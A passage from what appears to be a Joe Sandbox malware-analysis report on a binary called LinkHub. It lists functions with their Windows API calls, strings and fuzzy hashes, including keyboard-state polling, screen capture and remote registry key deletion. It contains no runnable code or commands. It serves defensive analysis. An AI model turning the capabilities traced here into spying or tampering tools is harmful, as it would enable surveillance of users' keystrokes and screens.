GlobalLock.KERNEL32(00000000), ref: 00E69024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E666D6,?,?,00000000,?), ref: 00E69033
GlobalUnlock.KERNEL32(00000000), ref: 00E6903C
CloseHandle.KERNEL32(00000000,?,?,?,?,00E666D6,?,?,00000000,?), ref: 00E69043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E666D6,?,?,00000000,?), ref: 00E69054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00E70C04,?), ref: 00E6906D
GlobalFree.KERNEL32(00000000), ref: 00E6907D
GetObjectW.GDI32(00000000,00000018,?), ref: 00E6909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00E690CD
DeleteObject.GDI32(00000000), ref: 00E690F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E6910B

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 922d29e30a3cc9cefa1c88d8707830adc358f288ea1f060f81453338bb7d0601
Instruction ID: 87a8ff4ff3b7a5888e7a1c16ff92944c11f4c40d5bd6432b93ef7e0df202e6a5
Opcode Fuzzy Hash: 922d29e30a3cc9cefa1c88d8707830adc358f288ea1f060f81453338bb7d0601
Instruction Fuzzy Hash: 54413971A00208BFDB119F66EC48EAB7BBCEF89794F104058F915E7261D7B09905CB20

Function 00E5C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Part of subcall function 00E5D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E5C10E,?,?), ref: 00E5D415
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D451
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D4C8
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E5C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E5C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 00E5C26A
RegCloseKey.ADVAPI32(?), ref: 00E5C2DE
RegCloseKey.ADVAPI32(?), ref: 00E5C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00E5C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E5C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 00E5C382
FreeLibrary.KERNEL32(00000000), ref: 00E5C3E3
RegCloseKey.ADVAPI32(00000000), ref: 00E5C3F4

Strings

RegDeleteKeyExW, xrefs: 00E5C35E
advapi32.dll, xrefs: 00E5C34D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: da2f2e9edcd2ee658254944982c8c88016176fc05fc60089ac9f729aced1ec47
Instruction ID: 6efbceb8b5fbb5a192112b0400a61a81b749c0697118cdb00b9005e66c07ac82
Opcode Fuzzy Hash: da2f2e9edcd2ee658254944982c8c88016176fc05fc60089ac9f729aced1ec47
Instruction Fuzzy Hash: 20C16F34208701AFD710DF14C894F5ABBE1EF44318F64989DE8559B3A2CB75E94ACBA1

Function 00E6A94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

GetSystemMetrics.USER32(0000000F), ref: 00E6A990
GetSystemMetrics.USER32(00000011), ref: 00E6A9A7
GetSystemMetrics.USER32(00000004), ref: 00E6A9B3
GetSystemMetrics.USER32(0000000F), ref: 00E6A9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00E6AC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E6AC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E6AC54
ShowWindow.USER32(00000003,00000000), ref: 00E6AC73
InvalidateRect.USER32(?,00000000,00000001), ref: 00E6AC95
DefDlgProcW.USER32(?,00000005,?), ref: 00E6ACBB

Strings

(, xrefs: 00E6A95B
@, xrefs: 00E6ABD0

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @$(
API String ID: 3962739598-2721164788
Opcode ID: 8b01fcb6e5872550413ed9f60efdecdeabe42fcd0d481f6a339e98ed81fbe9af
Instruction ID: 3458966666390f3ec8bceea1f51a9527869202abc08364fa9456b8cbb8aa48f7
Opcode Fuzzy Hash: 8b01fcb6e5872550413ed9f60efdecdeabe42fcd0d481f6a339e98ed81fbe9af
Instruction Fuzzy Hash: CBB19930A00219DFCF14CF69D9847AE7BB2BF44784F189079ED45BA295D770A984CF51

Function 00E6976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E697B6
GetFocus.USER32 ref: 00E697C6
GetDlgCtrlID.USER32(00000000), ref: 00E697D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00E69879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E6992B
GetMenuItemCount.USER32(?), ref: 00E69948
GetMenuItemID.USER32(?,00000000), ref: 00E69958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E6998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E699CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E699FD

Strings

0, xrefs: 00E698FB
(, xrefs: 00E69779

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0$(
API String ID: 1026556194-1385328161
Opcode ID: f9fe8398a8e46be0c6489dc2807c0acab0c723e68c1b12040e8cdde4a088f118
Instruction ID: 1f432fed72067fe0ab9934c29d2e5842345014493bc28faa19f68821e01b9939
Opcode Fuzzy Hash: f9fe8398a8e46be0c6489dc2807c0acab0c723e68c1b12040e8cdde4a088f118
Instruction Fuzzy Hash: 5281BE71A483019FD714CF25E885AAB7BECFB99398F00191DF985B7292C770D904CBA2

Function 00E52FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E53035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00E53045
CreateCompatibleDC.GDI32(?), ref: 00E53051
SelectObject.GDI32(00000000,?), ref: 00E5305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00E530CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00E53109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00E5312D
SelectObject.GDI32(?,?), ref: 00E53135
DeleteObject.GDI32(?), ref: 00E5313E
DeleteDC.GDI32(?), ref: 00E53145
ReleaseDC.USER32(00000000,?), ref: 00E53150

Strings

(, xrefs: 00E530EA

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: eb13dab87a05738c5c373c68228276004a853abada3479a2d18e802b88d6570e
Instruction ID: e0d9c67d7defc363c6a52fba37c4db5e44118e2ed8818c9a25fc16cb499ab5d4
Opcode Fuzzy Hash: eb13dab87a05738c5c373c68228276004a853abada3479a2d18e802b88d6570e
Instruction Fuzzy Hash: 5E6101B1E00209AFCB04CFA4DC84AAEBBF6FF48350F208419E955B7250D771AA45CFA0

Function 00E352AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00E352E6
GetWindowTextW.USER32(?,?,00000400), ref: 00E35328
_wcslen.LIBCMT ref: 00E35339
CharUpperBuffW.USER32(?,00000000), ref: 00E35345
_wcsstr.LIBVCRUNTIME ref: 00E3537A
GetClassNameW.USER32(00000018,?,00000400), ref: 00E353B2
GetWindowTextW.USER32(?,?,00000400), ref: 00E353EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00E35445
GetClassNameW.USER32(?,?,00000400), ref: 00E35477
GetWindowRect.USER32(?,?), ref: 00E354EF

Strings

ThumbnailClass, xrefs: 00E353BD, 00E35450

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: beba801cddc474971ddce4aa49d8b75b0d204d4279714f4306bcdc1445d5758b
Instruction ID: ff6ec7aa9236541d7951df2389011c440c77af3e515de92691b8bfc982d0a639
Opcode Fuzzy Hash: beba801cddc474971ddce4aa49d8b75b0d204d4279714f4306bcdc1445d5758b
Instruction Fuzzy Hash: 74910A72104B06AFD708DF24C888BAABBF9FF04358F005519FA56A2291E771FD55CB91

Function 00E3C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00EA29C0,000000FF,00000000,00000030), ref: 00E3C973
SetMenuItemInfoW.USER32(00EA29C0,00000004,00000000,00000030), ref: 00E3C9A8
Sleep.KERNEL32(000001F4), ref: 00E3C9BA
GetMenuItemCount.USER32(?), ref: 00E3CA00
GetMenuItemID.USER32(?,00000000), ref: 00E3CA1D
GetMenuItemID.USER32(?,-00000001), ref: 00E3CA49
GetMenuItemID.USER32(?,?), ref: 00E3CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E3CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E3CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E3CB0C

Strings

0, xrefs: 00E3C904

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 64f44404a6925d5502bc1460dd0db1391f781022565eabc9c2e8b07806ed59cc
Instruction ID: 03f719fb56dff6aa1e7f52bc77aa91bcec65c820506c7795042badccbcfe4367
Opcode Fuzzy Hash: 64f44404a6925d5502bc1460dd0db1391f781022565eabc9c2e8b07806ed59cc
Instruction Fuzzy Hash: 39618B70A0024AAFDF11CFA9DC8DAEEBFA8EB05348F241459E952B3251D770ED05CB61

Function 00E3E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E3E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E3E4FA
_wcslen.LIBCMT ref: 00E3E504
_wcsstr.LIBVCRUNTIME ref: 00E3E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E3E570

Strings

%u.%u.%u.%u, xrefs: 00E3E64E
StringFileInfo\, xrefs: 00E3E543
DefaultLangCodepage, xrefs: 00E3E5D3
04090000, xrefs: 00E3E5A6
\VarFileInfo\Translation, xrefs: 00E3E568

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: f8a6d4f5bd55653cf61a9b3054b8c6d636e44b409b9de34ab2cb14f7bdbe338d
Instruction ID: 8b05fd272bf1d41f8eb0a2a0ae5d223ab9896af26c665f67b7e779872fb9017c
Opcode Fuzzy Hash: f8a6d4f5bd55653cf61a9b3054b8c6d636e44b409b9de34ab2cb14f7bdbe338d
Instruction Fuzzy Hash: 3C412772A043187ADB14AB659C4BEBF7BACDF65750F015026FA00F61C2EB74AA01D2B5

Function 00E5D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E5D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00E5D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E5D7A8

Part of subcall function 00E5D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00E5D70A
Part of subcall function 00E5D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00E5D71D
Part of subcall function 00E5D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E5D72F
Part of subcall function 00E5D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E5D765
Part of subcall function 00E5D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E5D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 00E5D753

Strings

RegDeleteKeyExW, xrefs: 00E5D729
advapi32.dll, xrefs: 00E5D718

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: e9c016cc7039d281e0b0f8e72df5bacb9970b340ad30552645c62a7394e08fbb
Instruction ID: 3b96d320416d5a6916d94ea83160891e39f414c163f58d29d7d6ad5e8fccf927
Opcode Fuzzy Hash: e9c016cc7039d281e0b0f8e72df5bacb9970b340ad30552645c62a7394e08fbb
Instruction Fuzzy Hash: 5B317C71A05129BFDB319B91DC88EEFBB7CEF46755F000466F805F2100DAB09E4A9AA0

Function 00E3EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00E3EFCB

Part of subcall function 00DEF215: timeGetTime.WINMM(?,?,00E3EFEB), ref: 00DEF219

Sleep.KERNEL32(0000000A), ref: 00E3EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00E3F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E3F03E
SetActiveWindow.USER32 ref: 00E3F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E3F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00E3F08A
Sleep.KERNEL32(000000FA), ref: 00E3F095
IsWindow.USER32 ref: 00E3F0A1
EndDialog.USER32(00000000), ref: 00E3F0B2

Strings

BUTTON, xrefs: 00E3F030

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 4b8260f74ecdb669b87007946eb514e25ea2fdd160aeb04b7e5303d0b3d0bfe1
Instruction ID: e4458965421c0f49fd19f2ce0a9bdb02131a68841b402822327a4cee0b2ceb81
Opcode Fuzzy Hash: 4b8260f74ecdb669b87007946eb514e25ea2fdd160aeb04b7e5303d0b3d0bfe1
Instruction Fuzzy Hash: D8219571A04205BFD7116F36FD8DA27BF69EB8A789F401025F501B2272CBB1AC0CCA51

Function 00E3F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E3F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E3F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E3F39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E3F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E3F3BE

Strings

play PlayMe, xrefs: 00E3F3B9
alias PlayMe, xrefs: 00E3F34D
open , xrefs: 00E3F323
play PlayMe wait, xrefs: 00E3F3A8
close PlayMe, xrefs: 00E3F385, 00E3F3B2
status PlayMe mode, xrefs: 00E3F36F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 231c4dfc592b61075969a784e2a802583b1ab949ac750e562c348119cd95be27
Instruction ID: 0d0f7dfae4e404f90328d68cf8d586a1269c30cb20ff5c3739f6421dc166915a
Opcode Fuzzy Hash: 231c4dfc592b61075969a784e2a802583b1ab949ac750e562c348119cd95be27
Instruction Fuzzy Hash: B411A331A6026979DB20A366CC4AEFF6E7CEBD1B44F41142BB401F21D0EAA05D48C5B1

Function 00E02FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E03007

Part of subcall function 00E02D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0DB51,?,00000000,?,00000000,?,00E0DB78,?,00000007,?,?,00E0DF75,?), ref: 00E02D4E
Part of subcall function 00E02D38: GetLastError.KERNEL32(?,?,00E0DB51,?,00000000,?,00000000,?,00E0DB78,?,00000007,?,?,00E0DF75,?,?), ref: 00E02D60

_free.LIBCMT ref: 00E03013
_free.LIBCMT ref: 00E0301E
_free.LIBCMT ref: 00E03029
_free.LIBCMT ref: 00E03034
_free.LIBCMT ref: 00E0303F
_free.LIBCMT ref: 00E0304A
_free.LIBCMT ref: 00E03055
_free.LIBCMT ref: 00E03060
_free.LIBCMT ref: 00E0306E

Strings

&, xrefs: 00E02FFE

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: &
API String ID: 776569668-2586148540
Opcode ID: 768333984851741c4c5089cf4c7534a96cb5fa601c9a4132064e897aff776f92
Instruction ID: 27fc64b9af50d9acddcbca1a2649ffd3f91bf715111bdd9b102f481f7294de0b
Opcode Fuzzy Hash: 768333984851741c4c5089cf4c7534a96cb5fa601c9a4132064e897aff776f92
Instruction Fuzzy Hash: AB118976500108BFCB01EF94C846DDD3BE9EF05350B9195A9FA08AF162D631DE91AB50

Function 00E3A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00E3A9D9
SetKeyboardState.USER32(?), ref: 00E3AA44
GetAsyncKeyState.USER32(000000A0), ref: 00E3AA64
GetKeyState.USER32(000000A0), ref: 00E3AA7B
GetAsyncKeyState.USER32(000000A1), ref: 00E3AAAA
GetKeyState.USER32(000000A1), ref: 00E3AABB
GetAsyncKeyState.USER32(00000011), ref: 00E3AAE7
GetKeyState.USER32(00000011), ref: 00E3AAF5
GetAsyncKeyState.USER32(00000012), ref: 00E3AB1E
GetKeyState.USER32(00000012), ref: 00E3AB2C
GetAsyncKeyState.USER32(0000005B), ref: 00E3AB55
GetKeyState.USER32(0000005B), ref: 00E3AB63

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 337212fff772620bac99f4bd9ff2b41b872cdbe307b912b2a18c4c0d2d39032e
Instruction ID: bbefa6d0f01657d115976404086813c6c737f042a1a3aa21c158e5d51ff9c1c1
Opcode Fuzzy Hash: 337212fff772620bac99f4bd9ff2b41b872cdbe307b912b2a18c4c0d2d39032e
Instruction Fuzzy Hash: 1F51F620A0478429FB35DB609858BEAFFF59F52384F0C65A9C5C23A1C2DA549BCCC763

Function 00E3662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00E36649
GetWindowRect.USER32(00000000,?), ref: 00E36662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E366C0
GetDlgItem.USER32(?,00000002), ref: 00E366D0
